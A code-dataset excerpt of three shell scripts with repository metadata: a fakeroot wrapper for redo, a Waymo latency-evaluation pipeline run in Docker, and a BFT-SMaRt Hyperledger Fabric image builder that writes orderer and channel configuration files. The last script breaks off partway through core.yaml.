fakeroot true 2>/dev/null || broken=1
if [ -z "$broken" ] && [ -e "$frfile" ]; then
redo-ifchange "$frfile"
exec fakeroot -i "$frfile" "$@"
elif [ -z "$broken" ]; then
exec fakeroot "$@"
else
exec "$@"
fi
|
apenwarr/redo
|
docs/cookbook/container/try_fakeroot.sh
|
Shell
|
apache-2.0
| 243 |
#!/bin/bash
# Copyright 2022 The Waymo Open Dataset Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# Run the full latency evaluation pipeline (timing the functions and checking
# that the results match the submission proto) in a single shell script.
# Variables with the paths/commands for the binaries this script uses. They all
# use relative paths and assume that this script is run from the
# `waymo_open_dataset/latency` directory.
LATENCY_EVALUATOR_PATH="wod_latency_evaluator.py"
MAKE_OBJS_CMD="bazel run :make_objects_file_from_latency_results -- "
COMPARE_OBJS_TO_SUBMISSION_CMD="bazel run :compare_objects_file_to_submission_main -- "
# Process the arguments.
if [[ "$#" -ne 4 ]]; then
echo "Needs four arguments: the data directory, the image name, the submission pb, and the output latency file."
exit 1
fi
DATA_DIR=$1
IMAGE_NAME=$2
SUBMISSION_PB=$3
OUTPUT_LATENCY_FILE=$4
# Run the evaluation in a Docker container.
LOCAL_EVALUATOR_PATH=$(mktemp)
cp $LATENCY_EVALUATOR_PATH $LOCAL_EVALUATOR_PATH
DETECTION_OUTPUT_DIR=$(mktemp -d)
touch $OUTPUT_LATENCY_FILE
docker run --rm \
--mount type=bind,source=$LOCAL_EVALUATOR_PATH,dst=/code/evaluator.py,readonly \
--mount type=bind,source=$DATA_DIR,dst=/eval_data,readonly \
--mount type=bind,source=$DETECTION_OUTPUT_DIR,dst=/eval_outputs \
--mount type=bind,source=$OUTPUT_LATENCY_FILE,dst=/latency_output.txt \
$IMAGE_NAME python /code/evaluator.py \
--input_data_dir=/eval_data \
--output_dir=/eval_outputs \
--latency_result_file=/latency_output.txt
# Convert the detection results to an Objects file and compare against the
# submission.
OBJS_FILE=$(mktemp)
$MAKE_OBJS_CMD --results_dir $DETECTION_OUTPUT_DIR --output_file $OBJS_FILE
$COMPARE_OBJS_TO_SUBMISSION_CMD --latency_result_filename $OBJS_FILE --full_result_filenames $SUBMISSION_PB
# Clean up the outputs of the accuracy check.
sudo rm -rf $DETECTION_OUTPUT_DIR $OBJS_FILE
|
waymo-research/waymo-open-dataset
|
waymo_open_dataset/latency/run_latency_evaluation.sh
|
Shell
|
apache-2.0
| 2,537 |
#!/bin/bash
#tmpname=`mktemp -d -t`
VERSION=x86_64-1.1.1
function main() {
if [ $# -eq 0 ]; then
echo "Usage: $0 <system channel name> [clean]"
echo "Use 'clean' to deleted the auxiliary images (bftsmart/fabric and bftsmart/fabric-common)"
exit 1
fi
cd ..
#if [ ! -f dist/BFT-Proxy.jar ]; then
ant
#fi
cd docker_images
if [ ! -d ./temp ]; then
mkdir ./temp
fi
if [ -d ./temp/fabric_conf ]; then
rm -R ./temp/fabric_conf
fi
if [ -d ./temp/config ]; then
rm -R ./temp/config
fi
if [ -d ./temp/lib ]; then
rm -R ./temp/lib
fi
if [ -d ./temp/sampleconfig ]; then
rm -R ./temp/sampleconfig
fi
if [ -d ./temp/chaincode ]; then
rm -R ./temp/chaincode
fi
rm ./temp/*
cp ../dist/BFT-Proxy.jar ./temp
cp -r ../config ./temp/config
cp -r ../lib ./temp/lib
mkdir ./temp/fabric_conf
if [ -f ./temp/config/currentView ]; then
rm ./temp/config/currentView
fi
#create_hosts_config
#create_node_config
create_fabric_configtx
create_fabric_orderer
create_frontend_script
#dirname=`tar -tzf java.tar.gz | head -1 | cut -f1 -d"/"`
docker-compose build --build-arg SYS_CHAN_NAME=$1 fabric
docker create --name="fabric-temp" "bftsmart/fabric:x86_64-1.1.1"
id=$(docker ps -aqf "name=fabric-temp")
docker cp $id:/go/src/github.com/hyperledger/fabric/sampleconfig ./temp
docker cp $id:/go/src/github.com/hyperledger/fabric/genesisblock ./temp
docker cp $id:/go/src/github.com/hyperledger/fabric/build/bin/orderer ./temp
docker cp $id:/go/src/github.com/hyperledger/fabric/build/bin/configtxgen ./temp
docker cp $id:/go/src/github.com/hyperledger/fabric/orderer/sample_clients/broadcast_msg/broadcast_msg ./temp
docker cp $id:/go/src/github.com/hyperledger/fabric/orderer/sample_clients/broadcast_config/broadcast_config ./temp
docker cp $id:/go/src/github.com/hyperledger/fabric/orderer/sample_clients/deliver_stdout/deliver_stdout ./temp
docker cp $id:/go/src/github.com/hyperledger/fabric/examples/chaincode ./temp
docker cp $id:/usr/lib/libunixdomainsocket-linux-i386.so ./temp
docker cp $id:/usr/lib/libunixdomainsocket-linux-x86_64.so ./temp
docker rm -v $id
docker-compose build common orderingnode frontend
create_fabric_core
create_update_frontend_entrypoint_script
create_invoke_demo
create_query_demo
docker-compose build tools
if [ ! -z "$2" ] && [ $2 -eq "clean" ] ; then
docker rmi bftsmart/fabric
docker rmi bftsmart/fabric-common
fi
}
function create_frontend_script () {
cat > ./temp/startFrontend.sh << 'EOF'
#!/bin/bash
parse_yaml() {
local prefix=$2
local s='[[:space:]]*' w='[a-zA-Z0-9_]*' fs=$(echo @|tr @ '\034')
sed -ne "s|^\($s\)\($w\)$s:$s\"\(.*\)\"$s\$|\1$fs\2$fs\3|p" \
-e "s|^\($s\)\($w\)$s:$s\(.*\)$s\$|\1$fs\2$fs\3|p" $1 | sed 's/\$/\\\$/g' |
awk -F$fs '{
indent = length($1)/4;
vname[indent] = $2;
for (i in vname) {if (i > indent) {delete vname[i]}}
if (length($3) > 0) {
vn=""; for (i=0; i<indent; i++) {vn=(vn)(vname[i])("_")}
printf("%s%s%s=\"%s\"\n", "'$prefix'",vn, $2, $3);
}
}'
}
function main () {
eval $(parse_yaml /etc/hyperledger/fabric/orderer.yaml "orderer_")
java -cp bin/orderingservice.jar:lib/* bft.BFTProxy $1 $orderer_BFTsmart_ConnectionPoolSize $orderer_BFTsmart_RecvPort &
sleep 2
orderer start
}
main $@
EOF
}
function create_query_demo () {
cat > ./temp/query_demo.sh << 'EOF'
#!/bin/bash
if [ -f /tmp/query_demo ]; then {
echo "This script already executed!"
exit 0
}
fi
if [ -z $CORE_PEER_ADDRESS ] || [ $CORE_PEER_ADDRESS != bft.peer.1:7051 ]; then {
echo "Please set \$CORE_PEER_ADDRESS to 'bft.peer.1:7051'"
exit 0
}
fi
echo ""
echo "Fetching genesis block for channel47"
echo ""
peer channel fetch 0 ./channel47.block -c channel47 -o bft.frontend.2000:7050
echo ""
echo "Joining the peer to the channel"
echo ""
peer channel join -b channel47.block
echo ""
echo "Waiting 10 seconds for peer to fetch the ledger for channel channel47"
echo ""
sleep 10
echo ""
echo "Installing chaincode at the peer"
echo ""
peer chaincode install -n example02 -v 1.0 -p github.com/hyperledger/fabric/examples/chaincode/go/chaincode_example02
echo ""
echo "Querying the chaincode"
echo ""
peer chaincode query -C channel47 -n example02 -v 1.0 -c '{"Args":["query","a"]}'
echo ""
echo "Done!"
echo ""
touch /tmp/query_demo
EOF
}
function create_invoke_demo () {
cat > ./temp/invoke_demo.sh << 'EOF'
#!/bin/bash
if [ -f /tmp/invoke_done ]; then {
echo "This script already executed!"
exit 0
}
fi
if [ -z $CORE_PEER_ADDRESS ] || [ $CORE_PEER_ADDRESS != bft.peer.0:7051 ]; then {
echo "Please set \$CORE_PEER_ADDRESS to 'bft.peer.0:7051'"
exit 0
}
fi
echo ""
echo "Creating artifacts for channel bftchannel"
echo ""
configtxgen -profile SampleSingleMSPChannel -outputCreateChannelTx channel.tx -channelID channel47
configtxgen -profile SampleSingleMSPChannel -outputAnchorPeersUpdate anchor.tx -channelID channel47 -asOrg SampleOrg
echo ""
echo "Creating bftchannel and updating its anchor peer"
echo ""
peer channel create -o bft.frontend.1000:7050 -c channel47 -f channel.tx
peer channel update -o bft.frontend.1000:7050 -c channel47 -f anchor.tx
echo ""
echo "Joining the peer to the channel"
echo ""
peer channel join -b channel47.block
echo ""
echo "Waiting 10 seconds for peer to fetch the ledger for channel channel47"
echo ""
sleep 10
echo ""
echo "Installing and instantiating chaincode at the peer"
echo ""
peer chaincode install -n example02 -v 1.0 -p github.com/hyperledger/fabric/examples/chaincode/go/chaincode_example02
peer chaincode instantiate -o bft.frontend.1000:7050 -C channel47 -n example02 -v 1.0 -c '{"Args":["init","a","100","b","200"]}'
echo ""
echo "Waiting 10 seconds for peer to receive the new block and instantiate chaincode"
echo ""
sleep 10
echo ""
echo "Querying the chaincode"
echo ""
peer chaincode query -C channel47 -n example02 -v 1.0 -c '{"Args":["query","a"]}'
echo ""
echo "Issuing invocation on the chaincode"
echo ""
peer chaincode invoke -C channel47 -n example02 -v 1.0 -c '{"Args":["invoke","a","b","10"]}'
echo ""
echo "Waiting 10 seconds for peer to receive the new block and update its state"
echo ""
sleep 10
echo ""
echo "Querying the chaincode again"
echo ""
peer chaincode query -C channel47 -n example02 -v 1.0 -c '{"Args":["query","a"]}'
echo ""
echo "Done!"
echo ""
touch /tmp/invoke_done
EOF
}
function create_update_frontend_entrypoint_script() {
cat > ./temp/update_frontend_entrypoint.sh << 'EOF'
#!/bin/bash
if [ -z $3 ]; then
echo "Usage: $0 <path to genesis block> <json list with frontend entrypoints> <output file>"
exit 1
fi
block=$1
addresses=$2
output=$3
configtxlator proto_decode --input $block --type common.Block | jq .data.data[0].payload.data.config > config.json
jq -s '.[0] * {"channel_group":{"values":{"OrdererAddresses":{"value": {"addresses":.[1]}}}}}' config.json $addresses > modified_config.json
configtxlator proto_encode --input config.json --type common.Config --output config.pb
configtxlator proto_encode --input modified_config.json --type common.Config --output modified_config.pb
configtxlator compute_update --channel_id bftchannel --original config.pb --updated modified_config.pb --output frontend_update.pb
configtxlator proto_decode --input frontend_update.pb --type common.ConfigUpdate | jq . > frontend_update.json
echo '{"payload":{"header":{"channel_header":{"channel_id":"bftchannel", "type":2}},"data":{"config_update":'$(cat frontend_update.json)'}}}' | jq . > frontend_update_in_envelope.json
configtxlator proto_encode --input frontend_update_in_envelope.json --type common.Envelope --output $output
rm config.pb config.json modified_config.json modified_config.pb frontend_update.pb frontend_update.json frontend_update_in_envelope.json
EOF
}
function create_fabric_configtx () {
cat > ./temp/fabric_conf/configtx.yaml << 'EOF'
# Copyright IBM Corp. All Rights Reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
---
################################################################################
#
# PROFILES
#
# Different configuration profiles may be encoded here to be specified as
# parameters to the configtxgen tool. The profiles which specify consortiums
# are to be used for generating the orderer genesis block. With the correct
# consortium members defined in the orderer genesis block, channel creation
# requests may be generated with only the org member names and a consortium
# name.
#
################################################################################
Profiles:
# SampleInsecureSolo defines a configuration which uses the Solo orderer,
# contains no MSP definitions, and allows all transactions and channel
# creation requests for the consortium SampleConsortium.
SampleInsecureSolo:
Orderer:
<<: *OrdererDefaults
Consortiums:
SampleConsortium:
Organizations:
# SampleInsecureKafka defines a configuration that differs from the
# SampleInsecureSolo one only in that it uses the Kafka-based orderer.
SampleInsecureKafka:
Orderer:
<<: *OrdererDefaults
OrdererType: kafka
Consortiums:
SampleConsortium:
Organizations:
# JCS: my profile
# SampleInsecureBFTsmart defines a configuration that differs from the
# SampleInsecureSolo one only in that is uses the Kafka-based orderer.
SampleInsecureBFTsmart:
Orderer:
<<: *OrdererDefaults
OrdererType: bftsmart
Consortiums:
SampleConsortium:
Organizations:
# SampleDevModeSolo defines a configuration which uses the Solo orderer,
# contains the sample MSP as both orderer and consortium member, and
# requires only basic membership for admin privileges. It also defines
# an Application on the ordering system channel, which should usually
# be avoided.
SampleDevModeSolo:
Orderer:
<<: *OrdererDefaults
Organizations:
- <<: *SampleOrg
AdminPrincipal: Role.MEMBER
Application:
<<: *ApplicationDefaults
Organizations:
- <<: *SampleOrg
AdminPrincipal: Role.MEMBER
Consortiums:
SampleConsortium:
Organizations:
- <<: *SampleOrg
AdminPrincipal: Role.MEMBER
# SampleDevModeSoloV1.1 mimics the SampleDevModeSolo definition but
# additionally defines the v1.1 only capabilities which do not allow a
# mixed v1.0.x v1.1.x network.
SampleDevModeSoloV1_1:
Capabilities:
<<: *ChannelCapabilities
Orderer:
<<: *OrdererDefaults
Organizations:
- <<: *SampleOrg
AdminPrincipal: Role.MEMBER
Capabilities:
<<: *OrdererCapabilities
Application:
<<: *ApplicationDefaults
Organizations:
- <<: *SampleOrg
AdminPrincipal: Role.MEMBER
Capabilities:
<<: *ApplicationCapabilities
Consortiums:
SampleConsortium:
Organizations:
- <<: *SampleOrg
AdminPrincipal: Role.MEMBER
# SampleDevModeKafka defines a configuration that differs from the
# SampleDevModeSolo one only in that it uses the Kafka-based orderer.
SampleDevModeKafka:
Orderer:
<<: *OrdererDefaults
OrdererType: kafka
Organizations:
- <<: *SampleOrg
AdminPrincipal: Role.MEMBER
Application:
<<: *ApplicationDefaults
Organizations:
- <<: *SampleOrg
AdminPrincipal: Role.MEMBER
Consortiums:
SampleConsortium:
Organizations:
- <<: *SampleOrg
AdminPrincipal: Role.MEMBER
# SampleDevModeKafkaV1_1 mimics the SampleDevModeKafka definition but
# additionally defines the v1.1 only capabilities which do not allow a
# mixed v1.0.x v1.1.x network.
SampleDevModeKafkaV1_1:
Capabilities:
<<: *ChannelCapabilities
Orderer:
<<: *OrdererDefaults
OrdererType: kafka
Organizations:
- <<: *SampleOrg
AdminPrincipal: Role.MEMBER
Capabilities:
<<: *OrdererCapabilities
Application:
<<: *ApplicationDefaults
Organizations:
- <<: *SampleOrg
AdminPrincipal: Role.MEMBER
Capabilities:
<<: *ApplicationCapabilities
Consortiums:
SampleConsortium:
Organizations:
- <<: *SampleOrg
AdminPrincipal: Role.MEMBER
# SampleSingleMSPSolo defines a configuration which uses the Solo orderer,
# and contains a single MSP definition (the MSP sampleconfig).
# The Consortium SampleConsortium has only a single member, SampleOrg.
SampleSingleMSPSolo:
Orderer:
<<: *OrdererDefaults
Organizations:
- *SampleOrg
Consortiums:
SampleConsortium:
Organizations:
- *SampleOrg
# JCS: my profile
# SampleSingleMSPBFTsmart defines a configuration which uses the Solo orderer,
# and contains a single MSP definition (the MSP sampleconfig).
# The Consortium SampleConsortium has only a single member, SampleOrg
SampleSingleMSPBFTsmart:
Orderer:
<<: *OrdererDefaults
OrdererType: bftsmart
Organizations:
- *SampleOrg
Consortiums:
SampleConsortium:
Organizations:
- *SampleOrg
# SampleSingleMSPKafka defines a configuration that differs from the
# SampleSingleMSPSolo one only in that it uses the Kafka-based orderer.
SampleSingleMSPKafka:
Orderer:
<<: *OrdererDefaults
OrdererType: kafka
Organizations:
- *SampleOrg
Consortiums:
SampleConsortium:
Organizations:
- *SampleOrg
# SampleSingleMSPSoloV1_1 mimics the SampleSingleMSPSolo definition but
# additionally defines the v1.1 only capabilities which do not allow a
# mixed v1.0.x v1.1.x network.
SampleSingleMSPSoloV1_1:
Capabilities:
<<: *ChannelCapabilities
Orderer:
<<: *OrdererDefaults
Organizations:
- *SampleOrg
Capabilities:
<<: *OrdererCapabilities
Consortiums:
SampleConsortium:
Organizations:
- *SampleOrg
# SampleSingleMSPKafkaV1_1 defines a configuration that differs from the
# SampleSingleMSPSoloV1_1 one only in that it uses the Kafka-based orderer.
SampleSingleMSPKafkaV1_1:
Capabilities:
<<: *ChannelCapabilities
Orderer:
<<: *OrdererDefaults
OrdererType: kafka
Organizations:
- *SampleOrg
Capabilities:
<<: *OrdererCapabilities
Consortiums:
SampleConsortium:
Organizations:
- *SampleOrg
# SampleNoConsortium is very similar to SampleInsecureSolo, except it does
# not define Consortiums.
SampleNoConsortium:
Orderer:
<<: *OrdererDefaults
# SampleEmptyInsecureChannel defines a channel with no members and
# therefore no access control.
SampleEmptyInsecureChannel:
Consortium: SampleConsortium
Application:
Organizations:
# SampleSingleMSPChannel defines a channel with only the sample org as a
# member. It is designed to be used in conjunction with SampleSingleMSPSolo
# and SampleSingleMSPKafka orderer profiles.
SampleSingleMSPChannel:
Consortium: SampleConsortium
Application:
Organizations:
- *SampleOrg
# SampleSingleMSPChannelV1_1 defines a channel just as
# SampleSingleMSPChannel. However, it also defines the capabilities map which
# makes this channel incompatible with v1.0.x peers.
SampleSingleMSPChannelV1_1:
Consortium: SampleConsortium
Application:
Organizations:
- *SampleOrg
Capabilities:
<<: *ApplicationCapabilities
################################################################################
#
# ORGANIZATIONS
#
# This section defines the organizational identities that can be referenced
# in the configuration profiles.
#
################################################################################
Organizations:
# SampleOrg defines an MSP using the sampleconfig. It should never be used
# in production but may be used as a template for other definitions.
- &SampleOrg
# Name is the key by which this org will be referenced in channel
# configuration transactions.
# Name can include alphanumeric characters as well as dots and dashes.
Name: SampleOrg
# ID is the key by which this org's MSP definition will be referenced.
# ID can include alphanumeric characters as well as dots and dashes.
ID: DEFAULT
# MSPDir is the filesystem path which contains the MSP configuration.
MSPDir: msp
# AdminPrincipal dictates the type of principal used for an
# organization's Admins policy. Today, only the values of Role.ADMIN and
# Role.MEMBER are accepted, which indicates a principal of role type
# ADMIN and role type MEMBER respectively.
AdminPrincipal: Role.ADMIN
# AnchorPeers defines the location of peers which can be used for
# cross-org gossip communication. Note, this value is only encoded in
# the genesis block in the Application section context.
AnchorPeers:
- Host: 127.0.0.1
Port: 7051
################################################################################
#
# ORDERER
#
# This section defines the values to encode into a config transaction or
# genesis block for orderer related parameters.
#
################################################################################
Orderer: &OrdererDefaults
# Orderer Type: The orderer implementation to start.
# Available types are "solo" and "kafka".
OrdererType: solo
# Addresses here is a nonexhaustive list of orderers the peers and clients can
# connect to. Adding/removing nodes from this list has no impact on their
# participation in ordering.
# NOTE: In the solo case, this should be a one-item list.
Addresses:
- bft.frontend.1000:7050
- bft.frontend.2000:7050
# Batch Timeout: The amount of time to wait before creating a batch.
BatchTimeout: 2s
# Batch Size: Controls the number of messages batched into a block.
BatchSize:
# Max Message Count: The maximum number of messages to permit in a
# batch.
MaxMessageCount: 10
# Absolute Max Bytes: The absolute maximum number of bytes allowed for
# the serialized messages in a batch. If the "kafka" OrdererType is
# selected, set 'message.max.bytes' and 'replica.fetch.max.bytes' on
# the Kafka brokers to a value that is larger than this one.
AbsoluteMaxBytes: 10 MB
# Preferred Max Bytes: The preferred maximum number of bytes allowed
# for the serialized messages in a batch. A message larger than the
# preferred max bytes will result in a batch larger than preferred max
# bytes.
PreferredMaxBytes: 512 KB
# Max Channels is the maximum number of channels to allow on the ordering
# network. When set to 0, this implies no maximum number of channels.
MaxChannels: 0
Kafka:
# Brokers: A list of Kafka brokers to which the orderer connects. Edit
# this list to identify the brokers of the ordering service.
# NOTE: Use IP:port notation.
Brokers:
- kafka0:9092
- kafka1:9092
- kafka2:9092
#JCS: BFT-SMaRt options
BFTsmart:
# ConnectionPoolSize: The size of the connection pool that links the golang component to the java component.
ConnectionPoolSize: 20
# RecvPort: The localhost TCP port from which the java component sends blocks to the golang component.
RecvPort: 9999
# Organizations lists the orgs participating on the orderer side of the
# network.
Organizations:
################################################################################
#
# APPLICATION
#
# This section defines the values to encode into a config transaction or
# genesis block for application-related parameters.
#
################################################################################
Application: &ApplicationDefaults
# Organizations lists the orgs participating on the application side of the
# network.
Organizations:
################################################################################
#
# CAPABILITIES
#
# This section defines the capabilities of fabric network. This is a new
# concept as of v1.1.0 and should not be utilized in mixed networks with
# v1.0.x peers and orderers. Capabilities define features which must be
# present in a fabric binary for that binary to safely participate in the
# fabric network. For instance, if a new MSP type is added, newer binaries
# might recognize and validate the signatures from this type, while older
# binaries without this support would be unable to validate those
# transactions. This could lead to different versions of the fabric binaries
# having different world states. Instead, defining a capability for a channel
# informs those binaries without this capability that they must cease
# processing transactions until they have been upgraded. For v1.0.x if any
# capabilities are defined (including a map with all capabilities turned off)
# then the v1.0.x peer will deliberately crash.
#
################################################################################
Capabilities:
# Channel capabilities apply to both the orderers and the peers and must be
# supported by both. Set the value of the capability to true to require it.
Channel: &ChannelCapabilities
# V1.1 for Channel is a catchall flag for behavior which has been
# determined to be desired for all orderers and peers running v1.0.x,
# but the modification of which would cause incompatibilities. Users
# should leave this flag set to true.
V1_1: true
# Orderer capabilities apply only to the orderers, and may be safely
# manipulated without concern for upgrading peers. Set the value of the
# capability to true to require it.
Orderer: &OrdererCapabilities
# V1.1 for Order is a catchall flag for behavior which has been
# determined to be desired for all orderers running v1.0.x, but the
# modification of which would cause incompatibilities. Users should
# leave this flag set to true.
V1_1: true
# Application capabilities apply only to the peer network, and may be
# safely manipulated without concern for upgrading orderers. Set the value
# of the capability to true to require it.
Application: &ApplicationCapabilities
# V1.1 for Application is a catchall flag for behavior which has been
# determined to be desired for all peers running v1.0.x, but the
# modification of which would cause incompatibilities. Users should
# leave this flag set to true.
V1_1: true
# V1_1_PVTDATA_EXPERIMENTAL is an Application capability to enable the
# private data capability. It is only supported when using peers built
# with experimental build tag. When set to true, private data
# collections can be configured upon chaincode instantiation and
# utilized within chaincode Invokes.
# NOTE: Use of this feature with non "experimental" binaries on the
# network may cause a fork.
V1_1_PVTDATA_EXPERIMENTAL: false
# V1_1_RESOURCETREE_EXPERIMENTAL is an Application capability to enable
# the resources capability. Currently this is needed for defining
# resource-based access control (RBAC). RBAC helps set fine-grained
# access control on system resources such as the endorser and various
# system chaincodes. Default is v1.0-based access control based on
# CHANNEL_READERS and CHANNEL_WRITERS.
# NOTE: Use of this feature with non "experimental" binaries on
# the network may cause a fork.
V1_1_RESOURCETREE_EXPERIMENTAL: false
EOF
}
function create_fabric_orderer () {
cat > ./temp/fabric_conf/orderer.yaml << 'EOF'
# Copyright IBM Corp. All Rights Reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
---
################################################################################
#
# Orderer Configuration
#
# - This controls the type and configuration of the orderer.
#
################################################################################
General:
# Ledger Type: The ledger type to provide to the orderer.
# Two non-production ledger types are provided for test purposes only:
# - ram: An in-memory ledger whose contents are lost on restart.
# - json: A simple file ledger that writes blocks to disk in JSON format.
# Only one production ledger type is provided:
# - file: A production file-based ledger.
LedgerType: ram
# Listen address: The IP on which to bind to listen.
ListenAddress: 0.0.0.0
# Listen port: The port on which to bind to listen.
ListenPort: 7050
# TLS: TLS settings for the GRPC server.
TLS:
Enabled: false
PrivateKey: tls/server.key
Certificate: tls/server.crt
RootCAs:
- tls/ca.crt
ClientAuthRequired: false
ClientRootCAs:
# Keepalive settings for the GRPC server.
Keepalive:
# ServerMinInterval is the minimum permitted time between client pings.
# If clients send pings more frequently, the server will
# disconnect them.
ServerMinInterval: 60s
# ServerInterval is the time between pings to clients.
ServerInterval: 7200s
# ServerTimeout is the duration the server waits for a response from
# a client before closing the connection.
ServerTimeout: 20s
# Log Level: The level at which to log. This accepts logging specifications
# per: fabric/docs/Setup/logging-control.md
LogLevel: info
# Log Format: The format string to use when logging. Especially useful to disable color logging
LogFormat: '%{color}%{time:2006-01-02 15:04:05.000 MST} [%{module}] %{shortfunc} -> %{level:.4s} %{id:03x}%{color:reset} %{message}'
# Genesis method: The method by which the genesis block for the orderer
# system channel is specified. Available options are "provisional", "file":
# - provisional: Utilizes a genesis profile, specified by GenesisProfile,
# to dynamically generate a new genesis block.
# - file: Uses the file provided by GenesisFile as the genesis block.
GenesisMethod: file
# Genesis profile: The profile to use to dynamically generate the genesis
# block to use when initializing the orderer system channel and
# GenesisMethod is set to "provisional". See the configtx.yaml file for the
# descriptions of the available profiles. Ignored if GenesisMethod is set to
# "file".
GenesisProfile: SampleSingleMSPBFTsmart
# Genesis file: The file containing the genesis block to use when
# initializing the orderer system channel and GenesisMethod is set to
# "file". Ignored if GenesisMethod is set to "provisional".
GenesisFile: /etc/bftsmart-orderer/config/genesisblock
# LocalMSPDir is where to find the private crypto material needed by the
# orderer. It is set relative here as a default for dev environments but
# should be changed to the real location in production.
LocalMSPDir: msp
# LocalMSPID is the identity to register the local MSP material with the MSP
# manager. IMPORTANT: The local MSP ID of an orderer needs to match the MSP
# ID of one of the organizations defined in the orderer system channel's
# /Channel/Orderer configuration. The sample organization defined in the
# sample configuration provided has an MSP ID of "DEFAULT".
LocalMSPID: DEFAULT
# Enable an HTTP service for Go "pprof" profiling as documented at:
# https://golang.org/pkg/net/http/pprof
Profile:
Enabled: false
Address: 0.0.0.0:6060
# BCCSP configures the blockchain crypto service providers.
BCCSP:
# Default specifies the preferred blockchain crypto service provider
# to use. If the preferred provider is not available, the software
# based provider ("SW") will be used.
# Valid providers are:
# - SW: a software based crypto provider
# - PKCS11: a CA hardware security module crypto provider.
Default: SW
# SW configures the software based blockchain crypto provider.
SW:
# TODO: The default Hash and Security level needs refactoring to be
# fully configurable. Changing these defaults requires coordination
# SHA2 is hardcoded in several places, not only BCCSP
Hash: SHA2
Security: 256
# Location of key store. If this is unset, a location will be
# chosen using: 'LocalMSPDir'/keystore
FileKeyStore:
KeyStore:
# Authentication contains configuration parameters related to authenticating
# client messages
Authentication:
# the acceptable difference between the current server time and the
# client's time as specified in a client request message
TimeWindow: 15m
################################################################################
#
# SECTION: File Ledger
#
# - This section applies to the configuration of the file or json ledgers.
#
################################################################################
FileLedger:
# Location: The directory to store the blocks in.
# NOTE: If this is unset, a new temporary location will be chosen every time
# the orderer is restarted, using the prefix specified by Prefix.
Location: /var/hyperledger/production/orderer
# The prefix to use when generating a ledger directory in temporary space.
# Otherwise, this value is ignored.
Prefix: hyperledger-fabric-ordererledger
################################################################################
#
# SECTION: RAM Ledger
#
# - This section applies to the configuration of the RAM ledger.
#
################################################################################
RAMLedger:
# History Size: The number of blocks that the RAM ledger is set to retain.
# WARNING: Appending a block to the ledger might cause the oldest block in
# the ledger to be dropped in order to limit the number total number blocks
# to HistorySize. For example, if history size is 10, when appending block
# 10, block 0 (the genesis block!) will be dropped to make room for block 10.
HistorySize: 1000
################################################################################
#
# SECTION: Kafka
#
# - This section applies to the configuration of the Kafka-based orderer, and
# its interaction with the Kafka cluster.
#
################################################################################
Kafka:
# Retry: What do if a connection to the Kafka cluster cannot be established,
# or if a metadata request to the Kafka cluster needs to be repeated.
Retry:
# When a new channel is created, or when an existing channel is reloaded
# (in case of a just-restarted orderer), the orderer interacts with the
# Kafka cluster in the following ways:
# 1. It creates a Kafka producer (writer) for the Kafka partition that
# corresponds to the channel.
# 2. It uses that producer to post a no-op CONNECT message to that
# partition
# 3. It creates a Kafka consumer (reader) for that partition.
# If any of these steps fail, they will be re-attempted every
# <ShortInterval> for a total of <ShortTotal>, and then every
# <LongInterval> for a total of <LongTotal> until they succeed.
# Note that the orderer will be unable to write to or read from a
# channel until all of the steps above have been completed successfully.
ShortInterval: 5s
ShortTotal: 10m
LongInterval: 5m
LongTotal: 12h
# Affects the socket timeouts when waiting for an initial connection, a
# response, or a transmission. See Config.Net for more info:
# https://godoc.org/github.com/Shopify/sarama#Config
NetworkTimeouts:
DialTimeout: 10s
ReadTimeout: 10s
WriteTimeout: 10s
# Affects the metadata requests when the Kafka cluster is in the middle
# of a leader election.See Config.Metadata for more info:
# https://godoc.org/github.com/Shopify/sarama#Config
Metadata:
RetryBackoff: 250ms
RetryMax: 3
# What to do if posting a message to the Kafka cluster fails. See
# Config.Producer for more info:
# https://godoc.org/github.com/Shopify/sarama#Config
Producer:
RetryBackoff: 100ms
RetryMax: 3
# What to do if reading from the Kafka cluster fails. See
# Config.Consumer for more info:
# https://godoc.org/github.com/Shopify/sarama#Config
Consumer:
RetryBackoff: 2s
# Verbose: Enable logging for interactions with the Kafka cluster.
Verbose: false
# TLS: TLS settings for the orderer's connection to the Kafka cluster.
TLS:
# Enabled: Use TLS when connecting to the Kafka cluster.
Enabled: false
# PrivateKey: PEM-encoded private key the orderer will use for
# authentication.
PrivateKey:
# As an alternative to specifying the PrivateKey here, uncomment the
# following "File" key and specify the file name from which to load the
# value of PrivateKey.
#File: path/to/PrivateKey
# Certificate: PEM-encoded signed public key certificate the orderer will
# use for authentication.
Certificate:
# As an alternative to specifying the Certificate here, uncomment the
# following "File" key and specify the file name from which to load the
# value of Certificate.
#File: path/to/Certificate
# RootCAs: PEM-encoded trusted root certificates used to validate
# certificates from the Kafka cluster.
RootCAs:
# As an alternative to specifying the RootCAs here, uncomment the
# following "File" key and specify the file name from which to load the
# value of RootCAs.
#File: path/to/RootCAs
# Kafka protocol version used to communicate with the Kafka cluster brokers
# (defaults to 0.10.2.0 if not specified)
Version:
# JCS: new section for bftsmart
################################################################################
#
# SECTION: BFT-SMaRt
#
# - This section applies to the configuration of the bftsmart-based orderer.
#
################################################################################
BFTsmart:
# ConnectionPoolSize: The size of the connection pool that links the golang component to the java component.
ConnectionPoolSize: 10
# RecvPort: The localhost TCP port from which the java component sends blocks to the golang component.
RecvPort: 9999
################################################################################
#
# Debug Configuration
#
# - This controls the debugging options for the orderer
#
################################################################################
Debug:
# BroadcastTraceDir when set will cause each request to the Broadcast service
# for this orderer to be written to a file in this directory
BroadcastTraceDir:
# DeliverTraceDir when set will cause each request to the Deliver service
# for this orderer to be written to a file in this directory
DeliverTraceDir:
EOF
}
function create_fabric_core () {
cat > ./temp/fabric_conf/core.yaml << 'EOF'
# Copyright IBM Corp. All Rights Reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
###############################################################################
#
# LOGGING section
#
###############################################################################
logging:
# Default logging levels are specified here.
# Valid logging levels are case-insensitive strings chosen from
# CRITICAL | ERROR | WARNING | NOTICE | INFO | DEBUG
# The overall default logging level can be specified in various ways,
# listed below from strongest to weakest:
#
# 1. The --logging-level=<level> command line option overrides all other
# default specifications.
#
